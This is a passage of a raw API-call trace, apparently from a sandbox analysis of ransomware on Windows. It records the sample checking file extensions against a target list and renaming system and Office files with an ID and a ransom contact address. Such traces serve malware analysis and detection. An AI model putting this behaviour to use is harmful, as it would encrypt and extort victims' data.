returned -1 [0157.310] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.310] lstrlenW (lpString=".zip") returned 4 [0157.310] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.310] lstrlenW (lpString=".rar") returned 4 [0157.310] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.310] lstrlenW (lpString=".bz2") returned 4 [0157.310] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.310] lstrlenW (lpString=".7z") returned 3 [0157.310] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.310] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.310] lstrlenW (lpString=".dbf") returned 4 [0157.310] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.310] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.310] lstrlenW (lpString=".1cd") returned 4 [0157.310] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.310] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.310] lstrlenW (lpString=".jpg") returned 4 [0157.310] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.310] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.310] lstrlenW (lpString="meiryon_boot.ttf") returned 16 [0157.310] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.313] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=143754) returned 1 [0157.313] CloseHandle (hObject=0x3b0) returned 1 [0157.313] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0157.313] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.313] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.313] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.313] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.313] lstrlenW (lpString=".doc") returned 4 [0157.313] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.313] lstrlenW (lpString=".docx") returned 5 [0157.313] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.313] lstrlenW (lpString=".pdf") returned 4 [0157.313] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.313] lstrlenW (lpString=".xls") returned 4 [0157.313] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.313] lstrlenW (lpString=".xlsx") returned 5 [0157.314] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.314] lstrlenW (lpString=".ppt") returned 4 [0157.314] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString=".zip") returned 4 [0157.314] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.314] lstrlenW (lpString=".rar") returned 4 [0157.314] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString=".bz2") returned 4 [0157.314] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString=".7z") returned 3 [0157.314] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString=".dbf") returned 4 [0157.314] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString=".1cd") returned 4 [0157.314] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString=".jpg") returned 4 [0157.314] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.314] lstrlenW (lpString=".doc") returned 4 [0157.314] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.314] lstrlenW (lpString=".docx") returned 5 [0157.314] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.315] lstrlenW (lpString=".pdf") returned 4 [0157.315] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString=".xls") returned 4 [0157.315] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.315] lstrlenW (lpString=".xlsx") returned 5 [0157.315] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.315] lstrlenW (lpString=".ppt") returned 4 [0157.315] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.315] lstrlenW (lpString=".zip") returned 4 [0157.315] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.315] lstrlenW (lpString=".rar") returned 4 [0157.315] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString=".bz2") returned 4 [0157.315] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString=".7z") returned 3 [0157.315] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.315] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.315] lstrlenW (lpString=".dbf") returned 4 [0157.315] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.315] lstrlenW (lpString=".1cd") returned 4 [0157.315] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.315] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0157.315] lstrlenW (lpString=".jpg") returned 4 [0157.315] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.316] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.316] lstrlenW (lpString="meiryo_boot.ttf") returned 15 [0157.316] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.317] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=145419) returned 1 [0157.317] CloseHandle (hObject=0x3b0) returned 1 [0157.317] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0157.317] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.318] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.318] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0157.318] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0157.318] lstrlenW (lpString=".doc") returned 4 [0157.318] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.318] lstrlenW (lpString=".docx") returned 5 [0157.318] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.318] lstrlenW (lpString=".pdf") returned 4 [0157.318] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.318] lstrlenW (lpString=".xls") returned 4 [0157.318] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.318] lstrlenW (lpString=".xlsx") returned 5 [0157.318] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.318] lstrlenW (lpString=".ppt") returned 4 [0157.318] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.318] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0157.318] lstrlenW (lpString=".zip") returned 4 [0157.318] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.318] lstrlenW (lpString=".rar") returned 4 [0157.318] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.318] lstrlenW (lpString=".bz2") returned 4 [0157.318] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.318] lstrlenW (lpString=".7z") returned 3 [0157.318] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.318] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0157.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.736] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4559f98, Size=0x2000) returned 0x4559f98 [0157.736] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0157.739] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", dwFileAttributes=0x20) returned 1 [0163.566] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0163.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", dwFileAttributes=0x20) returned 1 [0163.572] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.572] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.572] CloseHandle (hObject=0x434) returned 1 [0163.573] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.573] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.573] CloseHandle (hObject=0x434) returned 1 [0163.574] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.574] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.574] CloseHandle (hObject=0x434) returned 1 [0163.574] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.574] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.575] CloseHandle (hObject=0x434) returned 1 [0163.575] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.575] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.576] CloseHandle (hObject=0x434) returned 1 [0163.576] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.576] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.577] CloseHandle (hObject=0x434) returned 1 [0163.577] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.577] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.577] CloseHandle (hObject=0x434) returned 1 [0163.578] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.578] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.579] CloseHandle (hObject=0x434) returned 1 [0163.579] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.579] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.580] CloseHandle (hObject=0x434) returned 1 [0163.580] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.581] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.581] CloseHandle (hObject=0x434) returned 1 [0163.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.582] CloseHandle (hObject=0x434) returned 1 [0163.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.583] CloseHandle (hObject=0x434) returned 1 [0163.583] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.583] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.802] CloseHandle (hObject=0x434) returned 1 [0163.804] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.804] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.805] CloseHandle (hObject=0x434) returned 1 [0163.806] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.806] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.806] CloseHandle (hObject=0x434) returned 1 [0163.807] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.807] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 